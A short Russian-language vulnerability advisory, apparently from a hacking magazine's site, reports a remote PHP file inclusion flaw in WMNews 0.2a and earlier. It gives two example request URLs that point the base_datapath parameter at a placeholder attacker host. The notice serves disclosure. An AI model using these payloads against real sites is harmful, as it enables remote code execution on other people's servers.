Рекомендуем почитать:


Хакер #315. Positive Hack Days Fest 3
Программа: WMNews <= 0.2a
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.
Пример:
/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]